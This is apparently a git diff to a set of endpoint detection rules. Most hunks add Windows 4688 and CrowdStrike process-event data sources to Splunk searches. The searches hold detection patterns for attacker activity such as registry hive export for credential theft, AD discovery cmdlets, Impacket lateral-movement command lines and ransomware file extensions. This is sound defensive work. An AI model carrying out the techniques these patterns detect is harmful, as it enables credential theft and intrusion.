   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cscript.exe"
   Processes.process="*-e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}*" by Processes.parent_process_name
diff --git a/detections/endpoint/execution_of_file_with_multiple_extensions.yml b/detections/endpoint/execution_of_file_with_multiple_extensions.yml
index e5a8a177a1..2fe73696eb 100644
--- a/detections/endpoint/execution_of_file_with_multiple_extensions.yml
+++ b/detections/endpoint/execution_of_file_with_multiple_extensions.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of files with multiple
   allowing further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*.doc.exe",
   "*.xls.exe","*.ppt.exe", "*.htm.exe", "*.html.exe", "*.txt.exe", "*.pdf.exe", "*.docx.exe",
diff --git a/detections/endpoint/extraction_of_registry_hives.yml b/detections/endpoint/extraction_of_registry_hives.yml
index bcadff399d..9154c3ea89 100644
--- a/detections/endpoint/extraction_of_registry_hives.yml
+++ b/detections/endpoint/extraction_of_registry_hives.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `reg.exe` to export Windo
   compromise and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_reg` (Processes.process=*save*
   OR Processes.process=*export*) AND (Processes.process="*\sam *" OR Processes.process="*\system
diff --git a/detections/endpoint/file_with_samsam_extension.yml b/detections/endpoint/file_with_samsam_extension.yml
index 8cf0a0e31e..5a80d37e93 100644
--- a/detections/endpoint/file_with_samsam_extension.yml
+++ b/detections/endpoint/file_with_samsam_extension.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects file writes with extensions indicative of a SamSam ransomware attack. It leverages file-system activity data to identify file names ending in .stubbin, .berkshire, .satoshi, .sophos, or .keyxml. This activity is significant because SamSam ransomware is highly destructive, leading to file encryption and ransom demands. If confirmed malicious, the impact includes significant financial losses, operational disruptions, and reputational damage. Immediate actions should include isolating affected systems, restoring files from backups, and investigating the attack source to prevent further incidents.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path)
   as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)`
diff --git a/detections/endpoint/firewall_allowed_program_enable.yml b/detections/endpoint/firewall_allowed_program_enable.yml
index 004add9e5c..fd941db74c 100644
--- a/detections/endpoint/firewall_allowed_program_enable.yml
+++ b/detections/endpoint/firewall_allowed_program_enable.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of a firewall rule
   maintain persistence within the target environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "*firewall*"
   Processes.process = "*allow*" Processes.process = "*add*" Processes.process = "*ENABLE*"
diff --git a/detections/endpoint/first_time_seen_child_process_of_zoom.yml b/detections/endpoint/first_time_seen_child_process_of_zoom.yml
index 1bb6193737..75ddc76ae6 100644
--- a/detections/endpoint/first_time_seen_child_process_of_zoom.yml
+++ b/detections/endpoint/first_time_seen_child_process_of_zoom.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the first-time execution of child
   execution, data exfiltration, or further compromise of the endpoint.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` min(_time) as firstTime values(Processes.parent_process_name)
   as parent_process_name values(Processes.parent_process_id) as parent_process_id
   values(Processes.process_name) as process_name values(Processes.process) as process
diff --git a/detections/endpoint/fodhelper_uac_bypass.yml b/detections/endpoint/fodhelper_uac_bypass.yml
index 3bf08952f6..036d21325a 100644
--- a/detections/endpoint/fodhelper_uac_bypass.yml
+++ b/detections/endpoint/fodhelper_uac_bypass.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the execution of fodhelper.exe, whi
   system compromise.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=fodhelper.exe
   by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/fsutil_zeroing_file.yml b/detections/endpoint/fsutil_zeroing_file.yml
index b50136e550..2258c46943 100644
--- a/detections/endpoint/fsutil_zeroing_file.yml
+++ b/detections/endpoint/fsutil_zeroing_file.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the 'fsutil' comman
   response efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe
diff --git a/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml b/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml
index 0fc63d761e..d349cb5654 100644
--- a/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml
+++ b/detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` ru
   and potential exploitation of domain security settings.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
   OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADDefaultDomainPasswordPolicy*"
diff --git a/detections/endpoint/get_aduser_with_powershell.yml b/detections/endpoint/get_aduser_with_powershell.yml
index cfc54fe740..4b3d94f474 100644
--- a/detections/endpoint/get_aduser_with_powershell.yml
+++ b/detections/endpoint/get_aduser_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   targets and plan subsequent attacks.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
   OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUser*"
diff --git a/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml b/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml
index cb7cfc985d..32f37856d5 100644
--- a/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml
+++ b/detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` ru
   aiding in further attacks such as password spraying or brute force attempts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
   OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUserResultantPasswordPolicy*"
diff --git a/detections/endpoint/get_domainpolicy_with_powershell.yml b/detections/endpoint/get_domainpolicy_with_powershell.yml
index 327f40553b..7a2e87b802 100644
--- a/detections/endpoint/get_domainpolicy_with_powershell.yml
+++ b/detections/endpoint/get_domainpolicy_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` ru
   aiding in privilege escalation and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
   OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainPolicy*"
diff --git a/detections/endpoint/get_domaintrust_with_powershell.yml b/detections/endpoint/get_domaintrust_with_powershell.yml
index 4932bbe871..bda69be0e0 100644
--- a/detections/endpoint/get_domaintrust_with_powershell.yml
+++ b/detections/endpoint/get_domaintrust_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the execution of the Get-DomainTr
   the domain.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process=*get-domaintrust*
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/get_domainuser_with_powershell.yml b/detections/endpoint/get_domainuser_with_powershell.yml
index f72d056f00..da73ac277b 100644
--- a/detections/endpoint/get_domainuser_with_powershell.yml
+++ b/detections/endpoint/get_domainuser_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   leading to further exploitation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
   OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainUser*"
diff --git a/detections/endpoint/get_foresttrust_with_powershell.yml b/detections/endpoint/get_foresttrust_with_powershell.yml
index d14075d71f..0bd85b5a93 100644
--- a/detections/endpoint/get_foresttrust_with_powershell.yml
+++ b/detections/endpoint/get_foresttrust_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the Get-ForestTrust
   escalation within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe
   OR Processes.process_name=cmd.exe Processes.process=*get-foresttrust* by Processes.dest
diff --git a/detections/endpoint/get_wmiobject_group_discovery.yml b/detections/endpoint/get_wmiobject_group_discovery.yml
index 1c49b46dd9..2e98a4c861 100644
--- a/detections/endpoint/get_wmiobject_group_discovery.yml
+++ b/detections/endpoint/get_wmiobject_group_discovery.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of the `Get-WMIObject Win32_
   or unauthorized access to sensitive resources.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe
   OR processes.process_name=cmd.exe) (Processes.process="*Get-WMIObject*" AND Processes.process="*Win32_Group*")
diff --git a/detections/endpoint/getadcomputer_with_powershell.yml b/detections/endpoint/getadcomputer_with_powershell.yml
index fd71cbaada..abc814c1b9 100644
--- a/detections/endpoint/getadcomputer_with_powershell.yml
+++ b/detections/endpoint/getadcomputer_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   attacks, potentially leading to unauthorized access and data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-AdComputer*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getadgroup_with_powershell.yml b/detections/endpoint/getadgroup_with_powershell.yml
index 83900cb33a..78cbf49c22 100644
--- a/detections/endpoint/getadgroup_with_powershell.yml
+++ b/detections/endpoint/getadgroup_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-AdGroup*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getcurrent_user_with_powershell.yml b/detections/endpoint/getcurrent_user_with_powershell.yml
index a3f858c269..063bf16ec7 100644
--- a/detections/endpoint/getcurrent_user_with_powershell.yml
+++ b/detections/endpoint/getcurrent_user_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   potentially facilitating further exploitation and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*System.Security.Principal.WindowsIdentity* OR Processes.process=*GetCurrent()*)
diff --git a/detections/endpoint/getdomaincomputer_with_powershell.yml b/detections/endpoint/getdomaincomputer_with_powershell.yml
index 0dba51ad46..20beca8a43 100644
--- a/detections/endpoint/getdomaincomputer_with_powershell.yml
+++ b/detections/endpoint/getdomaincomputer_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   further attacks, potentially leading to unauthorized access and data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-DomainComputer*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getdomaincontroller_with_powershell.yml b/detections/endpoint/getdomaincontroller_with_powershell.yml
index b1e963083d..a2b4dab869 100644
--- a/detections/endpoint/getdomaincontroller_with_powershell.yml
+++ b/detections/endpoint/getdomaincontroller_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   exploitation and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-DomainController*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getdomaingroup_with_powershell.yml b/detections/endpoint/getdomaingroup_with_powershell.yml
index 33f2b2f707..0c8f9512fd 100644
--- a/detections/endpoint/getdomaingroup_with_powershell.yml
+++ b/detections/endpoint/getdomaingroup_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   privilege escalation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-DomainGroup*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getlocaluser_with_powershell.yml b/detections/endpoint/getlocaluser_with_powershell.yml
index 16483c1c3c..c68191a45e 100644
--- a/detections/endpoint/getlocaluser_with_powershell.yml
+++ b/detections/endpoint/getlocaluser_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   privilege escalation within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-LocalUser*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getnettcpconnection_with_powershell.yml b/detections/endpoint/getnettcpconnection_with_powershell.yml
index e10e64b62a..3eb51f64e7 100644
--- a/detections/endpoint/getnettcpconnection_with_powershell.yml
+++ b/detections/endpoint/getnettcpconnection_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `powershell.exe`
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-NetTcpConnection*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml b/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml
index 73de135fe8..296d8e1db3 100644
--- a/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_ds_computer_with_powershell.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   potentially leading to unauthorized access and data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*"
diff --git a/detections/endpoint/getwmiobject_ds_group_with_powershell.yml b/detections/endpoint/getwmiobject_ds_group_with_powershell.yml
index f9dd5ae4a3..bc8d730680 100644
--- a/detections/endpoint/getwmiobject_ds_group_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_ds_group_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `powershell.exe`
   insights into the domain structure, aiding in further attacks and privilege escalation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-WmiObject* AND Processes.process="*namespace root\\directory\\ldap*"
diff --git a/detections/endpoint/getwmiobject_ds_user_with_powershell.yml b/detections/endpoint/getwmiobject_ds_user_with_powershell.yml
index 5ede6227b8..d2cde911cf 100644
--- a/detections/endpoint/getwmiobject_ds_user_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_ds_user_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   privilege escalation and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe"
   OR Processes.process_name="powershell*") AND Processes.process = "*get-wmiobject*"
diff --git a/detections/endpoint/getwmiobject_user_account_with_powershell.yml b/detections/endpoint/getwmiobject_user_account_with_powershell.yml
index ec1580ffee..a9d593662c 100644
--- a/detections/endpoint/getwmiobject_user_account_with_powershell.yml
+++ b/detections/endpoint/getwmiobject_user_account_with_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `powershell.exe` wi
   or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe")
   (Processes.process=*Get-WmiObject* AND Processes.process=*Win32_UserAccount*) by
diff --git a/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml b/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml
index d79351156a..76ce24e0be 100644
--- a/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml
+++ b/detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the execution of gpupdate.exe withou
   lateral movement, command and control, or other nefarious purposes, potentially
   leading to system compromise.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=gpupdate.exe by _time span=1h  Processes.process_id
   Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process
diff --git a/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml b/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml
index eac39a1875..0ffc7a1d57 100644
--- a/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml
+++ b/detections/endpoint/headless_browser_mockbin_or_mocky_request.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects headless browser activity accessing mockbin.org
   or mocky.io. It identifies processes with the "--headless" and "--disable-gpu" command
   line arguments, along with references to mockbin.org or mocky.io. This behavior
diff --git a/detections/endpoint/headless_browser_usage.yml b/detections/endpoint/headless_browser_usage.yml
index c81b4af1fc..bf3b7080c1 100644
--- a/detections/endpoint/headless_browser_usage.yml
+++ b/detections/endpoint/headless_browser_usage.yml
@@ -7,6 +7,8 @@ status: production
 type: Hunting
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: 'The following analytic detects the usage of headless browsers within
   an organization. It identifies processes containing the "--headless" and "--disable-gpu"
   command line arguments, which are indicative of headless browsing. This detection
diff --git a/detections/endpoint/hide_user_account_from_sign_in_screen.yml b/detections/endpoint/hide_user_account_from_sign_in_screen.yml
index 69341e54f5..d5316561c5 100644
--- a/detections/endpoint/hide_user_account_from_sign_in_screen.yml
+++ b/detections/endpoint/hide_user_account_from_sign_in_screen.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification t
   the attacker to maintain undetected access and control over the system, posing a
   severe security risk.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist*"
diff --git a/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml b/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml
index 14fa643a85..7602cac895 100644
--- a/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml
+++ b/detections/endpoint/hiding_files_and_directories_with_attrib_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the Windows binary attrib
   or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) values(Processes.process)
   as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=attrib.exe
   (Processes.process=*+h*) by Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/hunting_3cxdesktopapp_software.yml b/detections/endpoint/hunting_3cxdesktopapp_software.yml
index 73a147297d..d9914ac6c4 100644
--- a/detections/endpoint/hunting_3cxdesktopapp_software.yml
+++ b/detections/endpoint/hunting_3cxdesktopapp_software.yml
@@ -7,6 +7,8 @@ type: Hunting
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the presence of any version of the 3CXDesktopApp,
   also known as the 3CX Desktop App, on Mac or Windows systems. It leverages the Endpoint
   data model's Processes node to identify instances of the application running, although
diff --git a/detections/endpoint/icacls_deny_command.yml b/detections/endpoint/icacls_deny_command.yml
index 439ab93512..a6158bdba3 100644
--- a/detections/endpoint/icacls_deny_command.yml
+++ b/detections/endpoint/icacls_deny_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances where an adversary modifie
   incident response efforts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe",
   "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/deny*", "*/D*") by Processes.parent_process_name
diff --git a/detections/endpoint/icacls_grant_command.yml b/detections/endpoint/icacls_grant_command.yml
index a3fac0b278..82e167f054 100644
--- a/detections/endpoint/icacls_grant_command.yml
+++ b/detections/endpoint/icacls_grant_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the ICACLS command to gra
   data exfiltration, or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe",
   "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/grant*", "*/G*") by Processes.parent_process_name
diff --git a/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml b/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml
index 735ce37077..6998dd405f 100644
--- a/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml
+++ b/detections/endpoint/icedid_exfiltrated_archived_file_creation.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of suspicious files nam
   or escalate their presence within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '`sysmon` EventCode= 11  (TargetFilename = "*\\passff.tar" OR TargetFilename
   = "*\\cookie.tar") |stats count min(_time) as firstTime max(_time) as lastTime by
   TargetFilename EventCode process_id  process_name dest | `security_content_ctime(firstTime)`
diff --git a/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml b/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml
index 4f1f6c8e85..052911de65 100644
--- a/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml
+++ b/detections/endpoint/impacket_lateral_movement_commandline_parameters.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the use of suspicious command-lin
   exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe
   (Processes.process = "*/Q /c * \\\\127.0.0.1\\*$*" AND Processes.process IN ("*2>&1*","*2&gt;&amp;1*"))
diff --git a/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml b/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml
index bfd9ce7673..efcc0dd700 100644
--- a/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml
+++ b/detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies suspicious command-line parameters
   associated with the use of Impacket's smbexec.py for lateral movement. It leverages
   data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line
diff --git a/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml b/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml
index 974ea619a2..bbece08e39 100644
--- a/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml
+++ b/detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the use of Impacket's `wmiexec.py` tool
   for lateral movement by identifying specific command-line parameters. It leverages
   data from Endpoint Detection and Response (EDR) agents, focusing on processes spawned
diff --git a/detections/endpoint/java_writing_jsp_file.yml b/detections/endpoint/java_writing_jsp_file.yml
index ec20cfe789..d52ac5996c 100644
--- a/detections/endpoint/java_writing_jsp_file.yml
+++ b/detections/endpoint/java_writing_jsp_file.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the Java process writing a .jsp file
   this could allow unauthorized access, data exfiltration, or further compromise of
   the affected system, posing a severe security risk.
 data_source:
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name IN ("java","java.exe", "javaw.exe") by _time Processes.process_id
   Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)`
diff --git a/detections/endpoint/jscript_execution_using_cscript_app.yml b/detections/endpoint/jscript_execution_using_cscript_app.yml
index d1eb286807..4e6cb61b70 100644
--- a/detections/endpoint/jscript_execution_using_cscript_app.yml
+++ b/detections/endpoint/jscript_execution_using_cscript_app.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of JScript using the c
   scripts, leading to code execution, data exfiltration, or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
   = "cscript.exe" AND Processes.parent_process = "*//e:jscript*") OR (Processes.process_name
